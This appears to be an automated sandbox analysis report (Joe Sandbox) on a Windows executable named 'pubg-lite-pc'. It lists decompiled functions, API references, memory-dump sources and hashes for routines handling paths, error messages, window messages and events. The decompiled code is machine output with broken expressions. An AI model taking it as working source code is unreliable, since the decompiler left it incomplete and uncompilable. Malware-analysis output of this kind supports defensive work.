                                                                                                			E6D976D40(WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v16;
				char _v24;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v56;
				signed int _v60;
				short _v64;
				intOrPtr _v72;
				void* __ebx;
				void* __ebp;
				signed int _t46;
				signed int _t47;
				intOrPtr _t49;
				int _t53;
				char** _t54;
				char** _t60;
				signed int _t63;
				void* _t69;
				short* _t70;
				short _t71;
				WCHAR* _t77;
				short _t79;
				short _t86;
				intOrPtr _t92;
				void* _t101;
				signed int _t104;
				void* _t105;

				_t88 = __edx;
				_t70 = __ecx;
				_t69 = _t101;
				_t104 =  &(4[_t101 - 0x00000008 & 0xfffffff8]);
				_v8 =  *((intOrPtr*)(_t69 + 4));
				_t99 = _t104;
				_push(0xffffffff);
				_push(E6D9B6E3E);
				_push( *[fs:0x0]);
				_push(_t69);
				_t105 = _t104 - 0x30;
				_t46 =  *0x6d9e5024; // 0xe85bfa76
				_t47 = _t46 ^ _t104;
				_v32 = _t47;
				_push(_t47);
				 *[fs:0x0] =  &_v24;
				_t95 = __ecx;
				_t92 =  *((intOrPtr*)(_t69 + 8));
				_v72 = _t92;
				_v60 = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) >= 0xf8) {
					_t49 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t49 >= 8) {
						_t70 =  *((intOrPtr*)(__ecx));
					}
					if( *_t70 != 0x5c) {
						L8:
						_t71 = _t95;
						if(_t49 >= 8) {
							_t71 =  *_t95;
						}
						if( *((short*)(_t71 + 2)) != 0x3a) {
							goto L23;
						} else {
							goto L11;
						}
					} else {
						_t86 = _t95;
						if(_t49 >= 8) {
							_t86 =  *_t95;
						}
						if( *((short*)(_t86 + 2)) == 0x5c) {
							L11:
							_t77 = _t95;
							if(_t49 >= 8) {
								_t77 =  *_t95;
							}
							_t53 = PathIsUNCW(_t77);
							_t88 = _t95;
							_v64 = _t95[8];
							_t79 = _t95[0xa];
							if(_t53 != 1) {
								if(_t79 >= 8) {
									_t88 =  *_t95;
								}
								_t54 = _t105 - 8;
								_push(_v64);
								 *_t54 = L"\\\\?\\";
								_push(_t88);
								_t54[1] = 4;
								if(L6D9782E0() != 0) {
									goto L23;
								} else {
									E6D964D40(_t69,  &_v56, _t88, _t99, _t95);
									_v16 = 2;
									_push(4);
									_push(L"\\\\?\\");
									goto L18;
								}
							} else {
								if(_t79 >= 8) {
									_t88 =  *_t95;
								}
								_t60 = _t105 - 8;
								_push(_v64);
								 *_t60 = L"\\\\?\\UNC\\";
								_push(_t88);
								_t60[1] = 8;
								if(L6D9782E0() != 0) {
									L23:
									E6D964D40(_t69, _t92, _t88, _t99, _t95);
									goto L24;
								} else {
									E6D964D40(_t69,  &_v56, _t88, _t99, _t95);
									_v16 = 1;
									_t63 = _v40;
									_t90 =  <  ? _t63 : 2;
									_t85 =  >=  ? _v56 :  &_v56;
									_v40 = _t63 - 2;
									L6D98BED0( >=  ? _v56 :  &_v56, ( >=  ? _v56 :  &_v56) + ( <  ? _t63 : 2) * 2, 2 + (_t63 - 2) * 2);
									_push(8);
									_push(L"\\\\?\\UNC\\");
									L18:
									_push(0);
									L6D977560(_t69,  &_v56);
									asm("movups xmm0, [ebp-0x2c]");
									 *(_t92 + 0x10) = 0;
									 *(_t92 + 0x14) = 0;
									asm("movups [edi], xmm0");
									_v56 = 0;
									asm("movq xmm0, [ebp-0x1c]");
									asm("movq [edi+0x10], xmm0");
									_v40 = 0;
									_v36 = 7;
									_v60 = 1;
									_v16 = 0;
									L6D965CF0(_t69,  &_v56, _t92);
								}
							}
						} else {
							goto L8;
						}
					}
				} else {
					E6D964D40(_t69, _t92, __edx, _t99, __ecx);
					L24:
					_v16 = 0;
					_v60 = 1;
				}
				 *[fs:0x0] = _v24;
				return L6D98A13F(_v32 ^ _t99);
			}
































                                                                                                0x6d976d40
                                                                                                0x6d976d40
                                                                                                0x6d976d41
                                                                                                0x6d976d49
                                                                                                0x6d976d50
                                                                                                0x6d976d54
                                                                                                0x6d976d56
                                                                                                0x6d976d58
                                                                                                0x6d976d63
                                                                                                0x6d976d64
                                                                                                0x6d976d65
                                                                                                0x6d976d68
                                                                                                0x6d976d6d
                                                                                                0x6d976d6f
                                                                                                0x6d976d74
                                                                                                0x6d976d78
                                                                                                0x6d976d7e
                                                                                                0x6d976d80
                                                                                                0x6d976d83
                                                                                                0x6d976d86
                                                                                                0x6d976d94
                                                                                                0x6d976da3
                                                                                                0x6d976da9
                                                                                                0x6d976dab
                                                                                                0x6d976dab
                                                                                                0x6d976db1
                                                                                                0x6d976dc3
                                                                                                0x6d976dc3
                                                                                                0x6d976dc8
                                                                                                0x6d976dca
                                                                                                0x6d976dca
                                                                                                0x6d976dd1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d976db3
                                                                                                0x6d976db3
                                                                                                0x6d976db8
                                                                                                0x6d976dba
                                                                                                0x6d976dba
                                                                                                0x6d976dc1
                                                                                                0x6d976dd7
                                                                                                0x6d976dd7
                                                                                                0x6d976ddc
                                                                                                0x6d976dde
                                                                                                0x6d976dde
                                                                                                0x6d976de1
                                                                                                0x6d976dea
                                                                                                0x6d976dec
                                                                                                0x6d976def
                                                                                                0x6d976df5
                                                                                                0x6d976ec5
                                                                                                0x6d976ec7
                                                                                                0x6d976ec7
                                                                                                0x6d976ecc
                                                                                                0x6d976ece
                                                                                                0x6d976ed1
                                                                                                0x6d976ed7
                                                                                                0x6d976ed8
                                                                                                0x6d976ee9
                                                                                                0x00000000
                                                                                                0x6d976eeb
                                                                                                0x6d976eef
                                                                                                0x6d976ef4
                                                                                                0x6d976efb
                                                                                                0x6d976efd
                                                                                                0x00000000
                                                                                                0x6d976efd
                                                                                                0x6d976dfb
                                                                                                0x6d976dfe
                                                                                                0x6d976e00
                                                                                                0x6d976e00
                                                                                                0x6d976e05
                                                                                                0x6d976e07
                                                                                                0x6d976e0a
                                                                                                0x6d976e10
                                                                                                0x6d976e11
                                                                                                0x6d976e22
                                                                                                0x6d976f07
                                                                                                0x6d976f0a
                                                                                                0x00000000
                                                                                                0x6d976e28
                                                                                                0x6d976e2c
                                                                                                0x6d976e31
                                                                                                0x6d976e3d
                                                                                                0x6d976e45
                                                                                                0x6d976e4c
                                                                                                0x6d976e52
                                                                                                0x6d976e62
                                                                                                0x6d976e6a
                                                                                                0x6d976e6c
                                                                                                0x6d976e71
                                                                                                0x6d976e71
                                                                                                0x6d976e76
                                                                                                0x6d976e7b
                                                                                                0x6d976e7f
                                                                                                0x6d976e88
                                                                                                0x6d976e8f
                                                                                                0x6d976e92
                                                                                                0x6d976e96
                                                                                                0x6d976e9b
                                                                                                0x6d976ea0
                                                                                                0x6d976ea7
                                                                                                0x6d976eae
                                                                                                0x6d976eb5
                                                                                                0x6d976ebb
                                                                                                0x6d976ebb
                                                                                                0x6d976e22
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d976dc1
                                                                                                0x6d976d96
                                                                                                0x6d976d99
                                                                                                0x6d976f0f
                                                                                                0x6d976f0f
                                                                                                0x6d976f16
                                                                                                0x6d976f16
                                                                                                0x6d976f22
                                                                                                0x6d976f3c

                                                                                                APIs
                                                                                                • PathIsUNCW.SHLWAPI(?,E85BFA76,?,?), ref: 6D976DE1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Path
                                                                                                • String ID: \\?\$\\?\UNC\
                                                                                                • API String ID: 2875597873-3019864461
                                                                                                • Opcode ID: 8047a55b0103005cf4f44c8e89f2a10039d21190d0331305f8141c59eda6a62d
                                                                                                • Instruction ID: a48971b121b50d94827ce70c5db00318291cf8295f5e990dc3fb2b180765c528
                                                                                                • Opcode Fuzzy Hash: 8047a55b0103005cf4f44c8e89f2a10039d21190d0331305f8141c59eda6a62d
                                                                                                • Instruction Fuzzy Hash: 2F51E270E142049FDB25CFA8D894BAEB7B9FF95304F10861DD911AB281DB75E908CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097E210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000), ref: 0097E285
                                                                                                • SendMessageW.USER32(00000000,?,?), ref: 0097E347
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: MsiPropertyChanged
                                                                                                • API String ID: 3850602802-1228265352
                                                                                                • Opcode ID: c24db2b28e0d145e5523c37495032bb6ff6f51a598e74445e319332e143193f2
                                                                                                • Instruction ID: 73bbbe2066cc48e595ad80881a98878093e230dde41ad7f3527be373ed058ee3
                                                                                                • Opcode Fuzzy Hash: c24db2b28e0d145e5523c37495032bb6ff6f51a598e74445e319332e143193f2
                                                                                                • Instruction Fuzzy Hash: 0A41C476D00648EFCB14DFA8D944BDEB7B9FF58320F50466AF915A7280DB74A904CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097E880 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,STATIC,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0097E985
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0097E99D
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateCreateHeapMessageSendWindow
                                                                                                • String ID: STATIC
                                                                                                • API String ID: 3711884052-1882779555
                                                                                                • Opcode ID: 206511747e0bbdff82e17dbd0bb655dbd64987b805d1707b9135c8862329219f
                                                                                                • Instruction ID: 29b8cfef64d9c69bdecc7ffdd35202a7729601fde387ead1d4d3a61764872a0a
                                                                                                • Opcode Fuzzy Hash: 206511747e0bbdff82e17dbd0bb655dbd64987b805d1707b9135c8862329219f
                                                                                                • Instruction Fuzzy Hash: FC517275A00204AFCB14DF68C889FAEB7B5FF48710F14416DF915AB2A1DB70AD04CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0096E200 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                  • Part of subcall function 00995990: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,0093DCD8,00000000,80004005), ref: 009959FB
                                                                                                  • Part of subcall function 00995990: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00995A2B
                                                                                                • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 0096E34A
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0096E3AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$AllocateHeapWindow
                                                                                                • String ID: CheckList
                                                                                                • API String ID: 3168177373-2125086898
                                                                                                • Opcode ID: 554554c8b7ac87a756df9332ac0c8112cf2dfffcaab264af67f4bb184d05422f
                                                                                                • Instruction ID: 01d4f676aa0216d137c026672a6f227a2b226ba2cb5171ca546333bf70f76887
                                                                                                • Opcode Fuzzy Hash: 554554c8b7ac87a756df9332ac0c8112cf2dfffcaab264af67f4bb184d05422f
                                                                                                • Instruction Fuzzy Hash: 19515974A00609AFDB14DFA9C898BAEB7F5FF98314F10465DF416A7290DB70A904CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00984F20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009730D0: SendMessageW.USER32 ref: 00973110
                                                                                                • SendMessageW.USER32(?,00001127,009835D2,0000F000), ref: 00984F7B
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00985069
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: AiRefreshCost
                                                                                                • API String ID: 3850602802-1756256600
                                                                                                • Opcode ID: aa98ae28f976afc3148a8f2be9b437d4d6de178a442667c4b78f10607301efea
                                                                                                • Instruction ID: 846f06cf06ac7338ada74b7d7cd745ea13717d2c1b761a00eabdd1f06fef576f
                                                                                                • Opcode Fuzzy Hash: aa98ae28f976afc3148a8f2be9b437d4d6de178a442667c4b78f10607301efea
                                                                                                • Instruction Fuzzy Hash: 7A41AC30900208ABDF11EFA4C855BEEBBB9FF44714F200569E815AF396DB75AA05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00935D70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00AA9988,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033,F4D3B90A), ref: 00935E8D
                                                                                                • CloseHandle.KERNEL32(?,F4D3B90A), ref: 00935EC6
                                                                                                Strings
                                                                                                • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00935DD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$Handle
                                                                                                • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current
                                                                                                • API String ID: 187904097-2431777889
                                                                                                • Opcode ID: 03badfb2dadedbeecef64ff260a4ea33c3a49346f388b2894e25f80cde651034
                                                                                                • Instruction ID: 7a4d9c8596abe2317b1fa9c579a67e649320cbd09739bffbdaf76bb423a3b674
                                                                                                • Opcode Fuzzy Hash: 03badfb2dadedbeecef64ff260a4ea33c3a49346f388b2894e25f80cde651034
                                                                                                • Instruction Fuzzy Hash: 2F417A70D15298EADB10DFA4C949BDEFBB8BF15304F50819DE045B7281DBB85A48CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B62F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,F4D3B90A,00AB6DE8), ref: 009B6348
                                                                                                • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 009B643E
                                                                                                Strings
                                                                                                • Failed to get Windows error message [win32 error 0x, xrefs: 009B6366
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FormatFreeLocalMessage
                                                                                                • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                • API String ID: 1427518018-3373098694
                                                                                                • Opcode ID: 953a80c0991e4f0ede3cc82b2b47128f159f462b27c0278db1cf5d51bf1d6827
                                                                                                • Instruction ID: 07b8ae2af2b0476c4a03c32854bad64e9087e5e491dc1631a4dd85987630c212
                                                                                                • Opcode Fuzzy Hash: 953a80c0991e4f0ede3cc82b2b47128f159f462b27c0278db1cf5d51bf1d6827
                                                                                                • Instruction Fuzzy Hash: E741AF70A002089BDB10DFA8CD09BEFBBF9FF44714F104559E415EB291DBB8AA08CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9848C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E6D9848C0(void* __ebx, short* __ecx, long __edx) {
				void* _v8;
				char _v16;
				short _v20;
				void* _v28;
				short* _v32;
				char _v184;
				void* __ebp;
				signed int _t36;
				long _t40;
				short _t42;
				signed int _t43;
				void* _t46;
				short* _t60;
				signed int _t61;
				short _t72;
				long _t76;
				void* _t77;
				short* _t80;
				signed int _t82;

				_t60 = __ecx;
				_push(0xffffffff);
				_push(0x6d9b9619);
				_push( *[fs:0x0]);
				_t36 =  *0x6d9e5024; // 0xe85bfa76
				_push(_t36 ^ _t82);
				 *[fs:0x0] =  &_v16;
				_t76 = __edx;
				_t80 = __ecx;
				_v32 = __ecx;
				_v28 = 0;
				_v20 = 0;
				_v8 = 2;
				_t40 = FormatMessageW(0x13ff, 0, __edx, 0,  &_v20, 0, 0);
				_t85 = _t40;
				if(_t40 != 0) {
					_t72 = _v20;
					__eflags = 0;
					 *(_t80 + 0x10) = 0;
					 *((intOrPtr*)(_t80 + 0x14)) = 7;
					 *_t80 = 0;
					_t42 = _t72;
					_t29 = _t42 + 2; // 0x2
					_t77 = _t29;
					do {
						_t61 =  *_t42;
						_t42 = _t42 + 2;
						__eflags = _t61;
					} while (_t61 != 0);
					_t43 = _t42 - _t77;
					__eflags = _t43;
					_push(_t43 >> 1);
					_push(_t72);
					L6D965AF0(__ebx, _t80, _t72);
					_v28 = 1;
				} else {
					L6D97A280( &_v184, _t85, _t60);
					_v8 = 3;
					 *(_t82 +  *((intOrPtr*)(_v184 + 4)) - 0xa0) =  *(_t82 +  *((intOrPtr*)(_v184 + 4)) - 0xa0) & 0xfffffdff;
					 *(_t82 +  *((intOrPtr*)(_v184 + 4)) - 0xa0) =  *(_t82 +  *((intOrPtr*)(_v184 + 4)) - 0xa0) | 0x00000800;
					E6D984BA0(L6D984A10(E6D984BA0( &_v184, L"Failed to get Windows error message [win32 error 0x"), _t76), L"].");
					L6D97A190( &_v184, _t80);
					_v28 = 1;
					_v8 = 2;
					L6D979780( &_v184, _t85);
				}
				_v8 = 0;
				_t46 = _v20;
				if(_t46 != 0) {
					LocalFree(_t46);
					_v20 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t80;
			}






















                                                                                                0x6d9848c0
                                                                                                0x6d9848c3
                                                                                                0x6d9848c5
                                                                                                0x6d9848d0
                                                                                                0x6d9848d9
                                                                                                0x6d9848e0
                                                                                                0x6d9848e4
                                                                                                0x6d9848ea
                                                                                                0x6d9848ec
                                                                                                0x6d9848ee
                                                                                                0x6d9848f1
                                                                                                0x6d9848f8
                                                                                                0x6d9848ff
                                                                                                0x6d984918
                                                                                                0x6d98491e
                                                                                                0x6d984920
                                                                                                0x6d9849a6
                                                                                                0x6d9849a9
                                                                                                0x6d9849ab
                                                                                                0x6d9849b2
                                                                                                0x6d9849b9
                                                                                                0x6d9849bc
                                                                                                0x6d9849be
                                                                                                0x6d9849be
                                                                                                0x6d9849c1
                                                                                                0x6d9849c1
                                                                                                0x6d9849c4
                                                                                                0x6d9849c7
                                                                                                0x6d9849c7
                                                                                                0x6d9849cc
                                                                                                0x6d9849cc
                                                                                                0x6d9849d2
                                                                                                0x6d9849d3
                                                                                                0x6d9849d4
                                                                                                0x6d9849d9
                                                                                                0x6d984926
                                                                                                0x6d98492d
                                                                                                0x6d984932
                                                                                                0x6d98494a
                                                                                                0x6d98495e
                                                                                                0x6d98497d
                                                                                                0x6d984989
                                                                                                0x6d98498e
                                                                                                0x6d984995
                                                                                                0x6d98499f
                                                                                                0x6d98499f
                                                                                                0x6d9849e0
                                                                                                0x6d9849e7
                                                                                                0x6d9849ec
                                                                                                0x6d9849ef
                                                                                                0x6d9849f5
                                                                                                0x6d9849f5
                                                                                                0x6d984a01
                                                                                                0x6d984a0e

                                                                                                APIs
                                                                                                • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,E85BFA76), ref: 6D984918
                                                                                                • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 6D9849EF
                                                                                                Strings
                                                                                                • Failed to get Windows error message [win32 error 0x, xrefs: 6D984936
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FormatFreeLocalMessage
                                                                                                • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                • API String ID: 1427518018-3373098694
                                                                                                • Opcode ID: fb6bdf6feaf3105df6848d7810a1b33ebab54f4ded8df826c0d30d0c06eb9cfd
                                                                                                • Instruction ID: 20a519f2cf866a658c06a54b2cd3cd18d91799a75aaebc2b77f3f55a2a7ae861
                                                                                                • Opcode Fuzzy Hash: fb6bdf6feaf3105df6848d7810a1b33ebab54f4ded8df826c0d30d0c06eb9cfd
                                                                                                • Instruction Fuzzy Hash: A4318D71A042099FDB20CFA8C845BAFBBF9FF45B08F104959E515EB281D7B5EA04CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A00D70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenEventW.KERNEL32(00000000,00000000,00000001,_pbl_evt,00000008,?,?,00AB7440,00000001,F4D3B90A,00000000), ref: 00A00E17
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00A00E34
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Event$CreateOpen
                                                                                                • String ID: _pbl_evt
                                                                                                • API String ID: 2335040897-4023232351
